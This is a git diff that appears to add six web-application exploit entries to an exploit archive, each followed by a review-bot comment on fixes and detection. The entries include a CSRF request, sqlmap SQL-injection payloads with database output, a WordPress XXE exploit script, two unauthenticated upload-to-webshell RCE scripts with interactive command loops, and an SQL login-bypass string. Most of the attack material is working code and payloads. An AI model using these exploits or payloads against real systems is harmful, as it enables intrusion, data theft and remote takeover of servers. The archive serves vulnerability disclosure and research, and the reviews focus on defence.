diff --git a/exploits/multiple/webapps/50302.txt b/exploits/multiple/webapps/50302.txt
new file mode 100644
index 000000000..c7daf3fca
--- /dev/null
+++ b/exploits/multiple/webapps/50302.txt
@@ -0,0 +1,74 @@
+# Exploit Title: T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF)
+# Exploit Author: Alperen Ergel
+# Software Homepage: https://www.tsoft.com.tr/
+# Version : v4
+# Tested on: Kali Linux (2021.4) / xammp
+# Category: WebApp
+# Google Dork: intext:'T-Soft E-Ticaret Sistemleriyle Hazırlanmıştır.'"
+# Date: 2021-08-15
+######## Description ########
+#
+# Attacker can change admin informaiton
+#
+#
+######## Proof of Concept ########
+
+POST /srv/service/admin/updateuserinfo HTTP/1.1
+
+Host: localhost
+
+Cookie: lang=tr; PHPSESSID=f2904b66de6c0e7ac0d4a9707b9f978c; rest1SupportUser=0; countryCode=TR; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; webpush=1; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=
+
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+
+Accept: application/json, text/javascript, */*; q=0.01
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+Content-Type: application/x-www-form-urlencoded
+
+X-Requested-With: XMLHttpRequest
+
+Content-Length: 74
+
+Origin: http://localhost
+
+Referer: http://localhost/Y/
+
+Te: trailers
+
+Connection: close
+
+
+
+firstName=Victim&lastName=victim&email=victim%40mail.com&phone=12584368595
+
+
+
+
+####### EXPLOIT ##################
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
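Review bot: The captured request in the Proof of Concept section keeps what look like real session values in the `Cookie:` header (`PHPSESSID`, `U_TYPE_OK`, `TSOFT_LOGGED`); these should be replaced with placeholders such as `PHPSESSID=<redacted>` before the file is published. The block under `####### EXPLOIT` is empty, so the entry documents only the state-changing POST to `/srv/service/admin/updateuserinfo`, whose body carries four profile fields and no anti-CSRF token. A short remediation line would help readers on the defending side, for example `# Mitigation: require a per-session CSRF token on updateuserinfo, verify Origin/Referer, and set SameSite on the admin session cookie.`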
diff --git a/exploits/php/webapps/50303.txt b/exploits/php/webapps/50303.txt
new file mode 100644
index 000000000..641a3d56b
--- /dev/null
+++ b/exploits/php/webapps/50303.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)
+# Exploit Author: Erwin Krazek (Nero)
+# Date: 17/09/2021
+# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
+# Vendor: oretnom23
+# Version: v1.0
+# Tested on: Linux, Apache, Mysql
+# Exploit Description:
+Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack.
+
+# Vulnerable Code
+In search.php on line 28
+$count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows;
+
+Sqlmap command:
+sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch
+
+Output:
+---
+Parameter: search (GET)
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac
+
+Type: UNION query
+Title: Generic UNION query (NULL) - 14 columns
+Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- -
+---
+[17:33:38] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Debian
+web application technology: Apache 2.4.46, PHP
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+[17:33:38] [INFO] fetching database names
+available databases [4]:
+[*] church_db
+[*] information_schema
+[*] mysql
+[*] performance_schema
\ No newline at end of file
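Review bot: The advisory quotes the vulnerable statement from search.php line 28 but gives no fix, although the quoted line shows the cause directly: `$_GET['search']` is interpolated into the SQL text four times inside the `LIKE` patterns. I would add a remediation note after the Vulnerable Code section, e.g. `# Fix: use a prepared statement and bind '%'.$search.'%' for each LIKE instead of interpolating $_GET['search']`. The same gap is in exploits/php/webapps/50307.txt, where the quote-based `Username` value points to string-built SQL in the login query, though that code is not shown. For triage, the sqlmap output lists boolean-based, time-based and UNION techniques, so requests to `?p=search` whose `search` value contains `')` followed by `UNION`, `SLEEP(` or `OR NOT` are worth alerting on.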
diff --git a/exploits/php/webapps/50304.sh b/exploits/php/webapps/50304.sh
new file mode 100755
index 000000000..ad2671a0c
--- /dev/null
+++ b/exploits/php/webapps/50304.sh
@@ -0,0 +1,175 @@
+# Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)
+# Date: 16/09/2021
+# Exploit Author: David Utón (M3n0sD0n4ld)
+# Vendor Homepage: https://wordpress.com
+# Affected Version: WordPress 5.6-5.7 & PHP8
+# Tested on: Linux Ubuntu 18.04.5 LTS
+# CVE : CVE-2021-29447
+
+#!/bin/bash
+
+# Author: @David_Uton (m3n0sd0n4ld)
+# Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST
+# Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX
+
+
+# Variables
+rHost=$1
+username=$2
+password=$3
+readFile=$4
+lHost=$5
+
+# Functions
+# Logotype
+logoType(){
+ echo "
+=====================================
+CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated)
+-------------------------------------
+@David_Uton (M3n0sD0n4ld)
+https://m3n0sd0n4ld.github.io/
+====================================="
+}
+
+# Create wav malicious
+wavCreate(){
+ echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav"
+}
+
+# Create xx3.dtd
+dtdCreate(){
+cat < xx3.dtd
+
+" >
+EOT
+}
+
+# wav upload
+wavUpload(){
+cat < .upload.py
+#/usr/bin/env python3
+
+import requests, re, sys
+
+postData = {
+ 'log':"$username",
+ 'pwd':"$password",
+ 'wp-submit':'Log In',
+ 'redirect_to':'http://$rHost/wp-admin/',
+ 'testcookie':1
+}
+
+r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False) # SSL == verify=True
+
+cookies = r.cookies
+
+print("[+] Getting Wp Nonce ... ")
+
+res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies)
+wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)
+
+if len(wp_nonce_list) == 0 :
+ print("[-] Failed to retrieve the _wpnonce")
+ exit(0)
+else :
+ wp_nonce = wp_nonce_list[0]
+ print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce)
+
+print("[+] Uploading the wav file ... ")
+
+postData = {
+ 'name': 'payload.wav',
+ 'action': 'upload-attachment',
+ '_wpnonce': wp_nonce
+}
+
+wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))}
+r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies)
+if r_upload.status_code == 200:
+ image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
+ _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
+ print('[+] Wav uploaded successfully')
+else :
+ print("[-] Failed to receive a response for uploaded! Try again . \n")
+ exit(0)
+EOT
+python3 .upload.py
+}
+
+# Server Sniffer
+serverSniffer(){
+ statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid)
+}
+
+# Load file and decoder
+loadFile(){
+ content="http.server.log"
+ wavUpload
+
+ while :
+ do
+ if [[ -s $content ]]; then
+ echo "[+] Obtaining file information..."
+ sleep 5s # Increase time if the server is slow
+
+ base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2 | cut -d ' ' -f1 | sort -u)
+
+ # Check file exists
+ echo "" > decode.php
+ sizeCheck=$(wc -c decode.php | awk '{printf $1}')
+ if [[ $sizeCheck -gt "46" ]]; then
+ php decode.php
+ else
+ echo "[!] File does not exist or is not allowed to be read."
+ fi
+ break
+ fi
+ done
+}
+
+# Cleanup
+cleanup(){
+ kill $(cat http.server.pid) &>/dev/null
+ rm http.server.log http.server.pid &>/dev/null
+ rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null
+}
+
+
+# Execute
+logoType
+
+# Checking parameters
+if [[ $# -ne 5 ]];then
+ echo "[!] Parameters are missing!!!"
+ echo ""
+ echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST"
+else
+
+ # Test Connection...
+ echo "[*] Test connection to WordPress..."
+
+ # WP Auth
+ authCheck=$(curl -i -s -k -X $'POST' \
+ -H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 79' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+ -b $'wordpress_test_cookie=WP%20Cookie%20check' \
+ --data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
+"http://$rHost/wp-login.php" > .cookies.tmp)
+
+ auth=$(head -n 1 .cookies.tmp | awk '{ printf $2 }')
+
+ # Running authentication with WordPress.
+
+ if [[ $auth != "302" ]]; then
+ echo "[-] Authentication failed ! Check username and password"
+ else
+ echo "[+] Authentication successfull!!!"
+
+ # Create wav & dtd file
+ wavCreate
+ dtdCreate
+ serverSniffer
+ loadFile
+ cleanup
+ fi
+fi
\ No newline at end of file
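Review bot: `wavUpload` writes the WordPress password into `.upload.py` and the main block writes the login response into `.cookies.tmp`, but `cleanup` is only reached at the end of the success path, so a failed or interrupted run leaves credentials and session cookies in the working directory; `trap cleanup EXIT` near the top would cover that. `serverSniffer` starts `python3 -m http.server` with no `--bind` or `--directory`, which listens on all interfaces and serves that same directory, secrets included. The `#!/bin/bash` line sits below the comment header, so it is not a shebang, even though the script relies on bash-only `[[ ]]` and `&>`. For defenders, the behaviour visible in the script is an authenticated upload to `/wp-admin/async-upload.php`, presumably followed by the web server fetching a `.dtd` from an external host and then requesting a URL with a `?p=` value.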
diff --git a/exploits/php/webapps/50305.py b/exploits/php/webapps/50305.py
new file mode 100755
index 000000000..61bbd4996
--- /dev/null
+++ b/exploits/php/webapps/50305.py
@@ -0,0 +1,182 @@
+# Exploit Title: Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Exploit Author: Abdullah Khawaja (hax.3xploit)
+# Date: 2021-09-20
+# Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip
+# Version: 2.0
+# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
+# Description: Online Food Ordering System 2.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
+
+# Exploit Details:
+
+# 1. Access the 'admin/ajax.php', as it does not check for an authenticated user session.
+# 2. Set the 'action' parameter of the POST request to 'save_settings'.
+# - `ajax.php?action=save_settings`
+# 3. Capture request in burp and replace with with following request.
+
+'''
+POST /fos/admin/ajax.php?action=save_settings HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------120025571041714278883588636251
+Content-Length: 754
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/fos/admin/index.php?page=site_settings
+Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------120025571041714278883588636251
+Content-Disposition: form-data; name="name"
+
+adsa
+-----------------------------120025571041714278883588636251
+Content-Disposition: form-data; name="email"
+
+asdsad@asda.com
+-----------------------------120025571041714278883588636251
+Content-Disposition: form-data; name="contact"
+
+asdsad
+-----------------------------120025571041714278883588636251
+Content-Disposition: form-data; name="about"
+
+asdsad
+-----------------------------120025571041714278883588636251
+Content-Disposition: form-data; name="img"; filename="phpinfo.php"
+Content-Type: application/octet-stream
+
+
+-----------------------------120025571041714278883588636251--
+'''
+# ` Image uploader is renaming your payload using the following function.
+ # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
+ # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
+ # and print this function to get the value. e.g: Output: 1632085200
+ # concate output with your playload name like this 1632085200_phpinfo.php
+# 4. Communicate with the webshell at '/assets/img/1632085200_phpinfo.php?cmd=dir' using GET Requests.
+
+# RCE via executing exploit:
+ # Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py
+ # Step 2: Input the URL of the vulnerable application: Example: http://localhost/fos/
+
+
+import requests, sys, urllib, re
+import datetime
+from colorama import Fore, Back, Style
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+
+
+
+
+header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
+
+print(Style.BRIGHT+" Online Food Ordering System v2.0")
+print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
+print(header)
+
+print(r"""
+ ______ _______ ________
+ ___ //_/__ /_______ ___ _______ ______(_)_____ _
+ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/
+ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ /
+ /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/
+ /___/
+ abdullahkhawaja.com
+ """)
+
+
+
+GREEN = '\033[32m' # Green Text
+RED = '\033[31m' # Red Text
+RESET = '\033[m' # reset to the defaults
+
+#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
+
+
+#Create a new session
+s = requests.Session()
+
+
+#Set Cookie
+cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
+
+LINK=input("Enter URL of The Vulnarable Application : ")
+
+
+def webshell(LINK, session):
+ try:
+ WEB_SHELL = LINK+'/assets/img/'+filename
+ getdir = {'cmd': 'echo %CD%'}
+ r2 = session.get(WEB_SHELL, params=getdir, verify=False)
+ status = r2.status_code
+ if status != 200:
+ print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
+ r2.raise_for_status()
+ print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
+ cwd = re.findall('[CDEF].*', r2.text)
+ cwd = cwd[0]+"> "
+ term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+ while True:
+ thought = input(term)
+ command = {'cmd': thought}
+ r2 = requests.get(WEB_SHELL, params=command, verify=False)
+ status = r2.status_code
+ if status != 200:
+ r2.raise_for_status()
+ response2 = r2.text
+ print(response2)
+ except:
+ print("\r\nExiting.")
+ sys.exit(-1)
+
+
+#Creating a PHP Web Shell
+
+phpshell = {
+ 'img':
+ (
+ 'shell.php',
+ '',
+ 'application/octet-stream',
+ {'Content-Disposition': 'form-data'}
+ )
+ }
+
+# Defining value for form data
+data = {'name':'test', 'email':'info@sample.com', 'contact':'+6948 8542 623','about':'hello world'}
+
+
+def id_generator():
+ x = datetime.datetime.now()
+ date_string = x.strftime("%y-%m-%d %H:%M")
+ date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
+ timestamp = datetime.datetime.timestamp(date)
+ file = int(timestamp)
+ final_name = str(file)+'_shell.php'
+ return final_name
+
+filename = id_generator()
+#Uploading Reverse Shell
+print("[*]Uploading PHP Shell For RCE...")
+upload = s.post(LINK+'admin/ajax.php?action=save_settings', cookies=cookies, files=phpshell, data=data)
+
+shell_upload = True if("1" in upload.text) else False
+u=shell_upload
+if u:
+ print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
+else:
+ print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
+
+
+
+#Executing The Webshell
+webshell(LINK, s)
\ No newline at end of file
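Review bot: The header comments walk through exploitation but never state the fix, which leaves the root cause implicit: per those comments, `admin/ajax.php?action=save_settings` is reachable without a session check and stores the upload under `assets/img/` with the client-supplied name after a minute-resolution timestamp. I would add a comment block such as `# Mitigation: enforce an admin session in ajax.php, allowlist image extensions and verify content server-side, rename uploads to random names, and disable PHP execution in the upload directory.` The same applies to exploits/php/webapps/50306.py (`classes/Users.php?f=save`, `uploads/`). For detection, web-server logs showing a POST to that endpoint with no prior login, followed by GETs to `/assets/img/<digits>_*.php` with a `cmd` parameter, match what the script does.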
diff --git a/exploits/php/webapps/50306.py b/exploits/php/webapps/50306.py
new file mode 100755
index 000000000..b40358cd0
--- /dev/null
+++ b/exploits/php/webapps/50306.py
@@ -0,0 +1,193 @@
+# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Exploit Author: Abdullah Khawaja
+# Date: 2021-09-20
+# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
+# Version: 1.0
+# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
+# Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
+
+# Exploit Details:
+
+# 1. Access the 'classes/Users.php', as it does not check for an authenticated user session.
+# 2. Set the 'f' parameter of the POST request to 'save'.
+# - `Users.php?f=save`
+# 3. Capture request in burp and replace with with following request.
+'''
+POST /church_management/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550
+Content-Length: 859
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/church_management/admin/?page=user
+Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="firstname"
+
+Adminstrator
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="lastname"
+
+Admin
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="username"
+
+admin
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------91105564325608762312322546550
+Content-Disposition: form-data; name="img"; filename="phpinfo.php"
+Content-Type: application/octet-stream
+
+
+-----------------------------91105564325608762312322546550--
+
+'''
+# ` Image uploader is renaming your payload using the following function.
+ # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
+ # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
+ # and print this function to get the value. e.g: Output: 1632085200
+ # concate output with your playload name like this 1632085200_phpinfo.php
+# 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests.
+
+# RCE via executing exploit:
+ # Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py
+ # Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/
+
+
+import requests, sys, urllib, re
+import datetime
+from colorama import Fore, Back, Style
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
+
+print(Style.BRIGHT+" Church Management System v1.0")
+print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
+print(header)
+
+print(r"""
+
+
+ .----------.
+ .-''-. / /
+ . __ __ ___ .' .-. ) / ______.'
+ .'| | |/ `.' `. / .' / / / /_
+ .' | | .-. .-. ' (_/ / / / '''--.
+< | __ __ | | | | | | ,.----------. / / '___ `.
+ | | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. |
+ | | \ .' / | \ | / | \ || | | | | |\\ /. ' ) |
+ | |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' /
+ | /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'`
+ | | \ \ / / | |_/ / | |_ / /.-'_.' '------'''
+ ' \ \ \ \ \._,\ '/\ \._,\ '/ / _.'
+'------' '---'`--' `" `--' `" ( _.-'
+
+ abdullahkhawaja.com
+ """)
+
+
+
+GREEN = '\033[32m' # Green Text
+RED = '\033[31m' # Red Text
+RESET = '\033[m' # reset to the defaults
+#Create a new session
+#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
+
+
+
+s = requests.Session()
+
+
+
+#Set Cookie
+cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
+
+LINK=input("Enter URL of The Vulnarable Application : ")
+
+
+def webshell(LINK, session):
+ try:
+ WEB_SHELL = LINK+'uploads/'+filename
+ getdir = {'cmd': 'echo %CD%'}
+ r2 = session.get(WEB_SHELL, params=getdir, verify=False)
+ status = r2.status_code
+ if status != 200:
+ print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
+ r2.raise_for_status()
+ print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
+ cwd = re.findall('[CDEF].*', r2.text)
+ cwd = cwd[0]+"> "
+ term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+ while True:
+ thought = input(term)
+ command = {'cmd': thought}
+ r2 = requests.get(WEB_SHELL, params=command, verify=False)
+ status = r2.status_code
+ if status != 200:
+ r2.raise_for_status()
+ response2 = r2.text
+ print(response2)
+ except:
+ print("\r\nExiting.")
+ sys.exit(-1)
+
+
+#Creating a PHP Web Shell
+
+phpshell = {
+ 'img':
+ (
+ 'shell.php',
+ '',
+ 'application/octet-stream',
+ {'Content-Disposition': 'form-data'}
+ )
+ }
+
+# Defining value for form data
+data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''}
+
+
+def id_generator():
+ x = datetime.datetime.now()
+ date_string = x.strftime("%y-%m-%d %H:%M")
+ date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
+ timestamp = datetime.datetime.timestamp(date)
+ file = int(timestamp)
+ final_name = str(file)+'_shell.php'
+ return final_name
+
+filename = id_generator()
+#Uploading Reverse Shell
+print("[*]Uploading PHP Shell For RCE...")
+upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data)
+
+shell_upload = True if("Undefined index: id in" in upload.text) else False
+u=shell_upload
+if u:
+ print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
+else:
+ print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
+
+
+
+#Executing The Webshell
+webshell(LINK, s)
\ No newline at end of file
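Review bot: Unlike 50305.py, the form data posted here is `{'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''}`, so the request appears to write to the existing user with id 1 rather than only uploading a file, and the header does not warn about that side effect. A comment next to `data` such as `# NOTE: writes to the account with id=1; run only against a disposable test instance and restore the record afterwards` would make it explicit. The success test looks for the PHP notice text `Undefined index: id in` in the response, which suggests the application returns PHP notices to clients; turning off error display in production is worth listing as a separate hardening item. Defenders can treat an unexpected change to the id 1 profile as an indicator alongside new `.php` files under `uploads/`.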
diff --git a/exploits/php/webapps/50307.txt b/exploits/php/webapps/50307.txt
new file mode 100644
index 000000000..8aedae48d
--- /dev/null
+++ b/exploits/php/webapps/50307.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
+# Exploit Author: Prunier Charles-Yves
+# Date: September 20, 2021
+# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
+# Tested on: Linux, windows
+# Vendor: oretnom23
+# Version: v1.0
+
+# Exploit Description:
+Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application
+allowing the attacker to login with admin acount
+
+
+----- PoC: Authentication Bypass -----
+
+Administration Panel: http://localhost/expense_budget/admin/login.php
+
+Username: admin' or ''=' --
\ No newline at end of file
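Review bot: The title reads "Authenticated Bypass", but the PoC is a login without valid credentials, i.e. an authentication bypass; the same wording is carried into the new row for 50307 in files_exploits.csv and will make the entry harder to find. The description also misspells `admin acount` and does not say which input is affected, while the PoC shows it is the `Username` field of `admin/login.php`. I would reword the description to `... is prone to an authentication bypass via SQL injection in the Username field of admin/login.php, allowing login as the admin account`.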
diff --git a/files_exploits.csv b/files_exploits.csv
index 8791f8482..6b4e46cf0 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44420,3 +44420,9 @@ id,file,description,date,author,type,platform,port
50299,exploits/php/webapps/50299.py,"WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass",1970-01-01,0xB455,webapps,php,
50300,exploits/php/webapps/50300.py,"Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)",1970-01-01,boku,webapps,php,
50301,exploits/php/webapps/50301.txt,"Simple Attendance System 1.0 - Authenticated bypass",1970-01-01,"Abdullah Khawaja",webapps,php,
+50302,exploits/multiple/webapps/50302.txt,"T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF)",1970-01-01,"Alperen Ergel",webapps,multiple,
+50303,exploits/php/webapps/50303.txt,"Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)",1970-01-01,"Erwin Krazek",webapps,php,
+50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",1970-01-01,"David Utón",webapps,php,
+50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
+50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
+50307,exploits/php/webapps/50307.txt,"Budget and Expense Tracker System 1.0 - Authenticated Bypass",1970-01-01,"Prunier Charles-Yves",webapps,php,
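Review bot: All six added rows carry `1970-01-01` in the `date` column although each advisory file states its own date in the header (for example `2021-08-15` in 50302.txt and `2021-09-20` in 50305.py and 50306.py). The three context rows show the same value, so this looks like an export default rather than a typo, but it makes the index useless for sorting or for correlating entries with disclosure timelines. If the column is meant to hold the publication date, the 50302 row should end `...(CSRF)",2021-08-15,"Alperen Ergel",webapps,multiple,` and the others likewise. The author for 50303 is also shortened to `Erwin Krazek` where the file header says `Erwin Krazek (Nero)`, which may be intentional.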